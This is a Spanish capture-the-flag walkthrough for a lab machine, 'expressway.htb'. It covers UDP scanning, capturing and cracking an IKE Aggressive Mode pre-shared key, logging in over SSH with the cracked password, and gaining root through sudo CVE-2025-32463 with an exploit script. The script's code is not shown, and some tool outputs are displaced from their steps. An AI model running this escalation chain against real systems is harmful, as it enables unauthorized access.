Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-23 06:51 EDT
Nmap scan report for 10.10.11.87
Host is up (0.031s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.34 seconds
Veremos solamente un puerto SSH sin ninguna web ni nada, por lo que vamos a probar a realizar un escaneo por UDP a ver si hay algo oculto por ahi.
nmap-sU--min-rate1000--top-ports100<IP>
Info:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-23 07:06 EDT
Nmap scan report for 10.10.11.87
Host is up (0.033s latency).
Not shown: 94 open|filtered udp ports (no-response)
PORT STATE SERVICE
500/udp open isakmp
515/udp closed printer
996/udp closed vsinet
31337/udp closed BackOrifice
49186/udp closed unknown
49201/udp closed unknown
Nmap done: 1 IP address (1 host up) scanned in 0.54 seconds
Veremos que el servicio 500 esta abierto, vamos a obtener mas informacion de dicho puerto a ver que tiene, pero de primeras ya sabemos que es un ISAKMP (Internet Security Association and Key Management Protocol) es usado principalmente por VPNs IPSec.
Info:
La caracteristicas que estamos viendo son las siguientes:
XAUTH (Extended Authentication) - Permite autenticación adicional Dead Peer Detection v1.0 - Mantiene la conexión activa
Vamos a comprobar si acepta un Aggressive Mode realizando una peticion de esta forma:
Info:
Vemos que si esta funcionando y estamos viendo informacion muy valiosa como la siguiente:
Hemos descubierto un dominio llamado expressway.htb, vamos añadirlo a nuestro archivo hosts de esta forma:
Lo guardamos y probamos a realizar otra peticion de esta forma para intentar capturar el hash PSK.
Escalate user ike
Ahora si leemos el archivo...
expressway.psk
Vemos que lo hemos capturado de forma correcta, ahora vamos a probar a crackearlo.
Info:
Vemos que ha funcionado, tenemos una contraseña y tambien un usuario llamado ike del dominio, vamos a probar si funciona por SSH.
SSH
Metemos como contraseña freakingrockstarontheroad...
Con esto veremos que ya estaremos dentro, por lo que leeremos la flag del usuario.
user.txt
Escalate Privileges
Si listamos los grupos a los que pertenecemos, veremos lo siguiente:
Vemos que somos del grupo proxy, por lo que es muy interesante, si buscamos que pertenece a dicho grupo, no veremos gran cosa.
Si vemos la version de sudo que hay en el sistema.
Info:
Veremos que es una version vulnerable, si buscamos informacion veremos que tiene un CVE asociado llamado CVE-2025-32463, encontraremos un exploit en la siguiente URL.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-23 07:08 EDT
Nmap scan report for 10.10.11.87
Host is up (0.040s latency).
PORT STATE SERVICE VERSION
500/udp open isakmp?
| ike-version:
| attributes:
| XAUTH
|_ Dead Peer Detection v1.0
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.07 seconds
Last login: Wed Sep 17 10:26:26 BST 2025 from 10.10.14.77 on ssh
Linux expressway.htb 6.16.7+deb14-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.16.7-1 (2025-09-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Sep 23 12:31:36 2025 from 10.10.14.98
ike@expressway:~$ whoami
ike
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17
chmod +x exploit.sh
./exploit.sh
woot!
root@expressway:/# whoami
root
root@expressway:/# id
uid=0(root) gid=0(root) groups=0(root),13(proxy),1001(ike)
